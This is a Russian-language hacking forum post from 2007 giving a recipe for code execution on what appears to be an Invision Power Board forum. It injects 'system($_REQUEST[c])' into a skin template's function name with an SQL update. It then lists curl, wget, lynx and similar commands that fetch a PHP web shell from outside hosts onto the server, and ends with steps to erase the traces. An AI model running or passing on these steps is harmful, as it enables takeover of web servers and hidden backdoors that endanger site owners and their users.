03.04.2007, 15:03
|
|
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
С нами:
10282956
Репутация:
380
|
|
Есть еще способ через SQL Toolbox
Код:
Заходим в админку, выбираем SQL Management > mySQL Toolbox > 120_skin_templates
Нужно в столбце func_name изменить значение calendar_start_form
на "aaa(){}}; system($_REQUEST[c]); class qwerty{function ggg"
Для этого делаем один запрос:
update 120_skin_templates set func_name="aaa(){}}; system($_REQUEST[c]); class qwerty{function bbb" where func_name="calendar_start_form";
Теперь ставим Use safe mode skins? > Yes
Готово! Заходим в календарь и в параметре 'c' передаем команды.
Заливаем нормальный шелл:
curl --output /papka/na/servere/shell.php http://site.com/shell.php
wget -o /papka/na/servere/shell.php http://site.com/shell.php
get http://site.com/shell.php > /papka/na/servere/shell.php
links -source "http://site.com/shell.php" > /papka/na/servere/shell.php
lynx -source http://site.com/shell.php > /papka/na/servere/shell.php
fetch -o /papka/na/servere/shell.php http://site.com/shell.php
get http://test2.ru/shells/rst.txt > uploads/sh.php
Чистим после себя:
Use safe mode skins? > No
update 120_skin_templates set func_name="calendar_start_form" where func_name="aaa(){}}; system($_REQUEST[c]); class qwerty{function bbb";
18.03.2007 by DeusTirael
Там еще видео было, но я саму тему найти не смог, если захочешь на _http://damagelab.org поищи
З,Ы, у меня такое было, но потом через промежуток времени (от 2 часов до 2 дней) эти шелы начинали работать, хз из-за чего
Последний раз редактировалось maxster; 03.04.2007 в 15:15..
|
|
|